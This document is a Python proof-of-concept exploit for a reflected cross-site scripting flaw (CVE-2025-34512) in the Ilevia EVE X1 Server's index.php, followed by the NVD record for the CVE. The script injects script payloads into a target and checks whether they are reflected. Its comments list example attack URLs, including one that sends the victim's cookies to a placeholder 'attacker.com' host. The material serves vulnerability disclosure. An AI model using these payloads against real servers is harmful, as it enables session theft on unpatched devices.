CVE-2025-34512

# CVE-2025-34512 - Ilevia EVE X1 Server Reflected XSS PoC # Vulnerability: Reflected XSS in index.php # Affected: Ilevia EVE X1 Server firmware <= 4.7.18.0.eden # Author: VulnCheck / Zero Science Lab import requests import sys TARGET_URL = "http://TARGET_HOST:8080/index.php" def generate_poc_url(target, param="page", payload=None): """Generate malicious URL with XSS payload reflected in index.php""" if payload is None: # Default payload to demonstrate cookie theft payload = '<script>alert(document.cookie)</script>' malicious_url = f"{target}?{param}={payload}" return malicious_url def exploit_xss(target_url): """Send the crafted XSS request and verify reflection""" payload = '<script>alert("XSS-CVE-2025-34512")</script>' params = {"page": payload} try: response = requests.get(target_url, params=params, timeout=10) if payload in response.text: print(f"[+] XSS payload reflected successfully!") print(f"[+] Vulnerable URL: {response.url}") return True else: print("[-] Payload not reflected. Target may not be vulnerable.") return False except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = f"http://{sys.argv[1]}:8080/index.php" poc_url = generate_poc_url(TARGET_URL) print(f"[*] Generated PoC URL: {poc_url}") exploit_xss(TARGET_URL) # Example malicious URL: # http://VICTIM_IP:8080/index.php?page=<script>alert(document.cookie)</script> # http://VICTIM_IP:8080/index.php?page=<img src=x onerror=alert(1)> # http://VICTIM_IP:8080/index.php?redirect=<script>document.location='http://attacker.com/?c='+document.cookie</script>

{"cve": {"id": "CVE-2025-34512", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:35.447", "lastModified": "2025-10-23T19:33:42.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain a reflected cross-site scripting (XSS) vulnerability in index.php that allows an unauthenticated attacker to execute arbitrary code. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-reflected-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5961.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}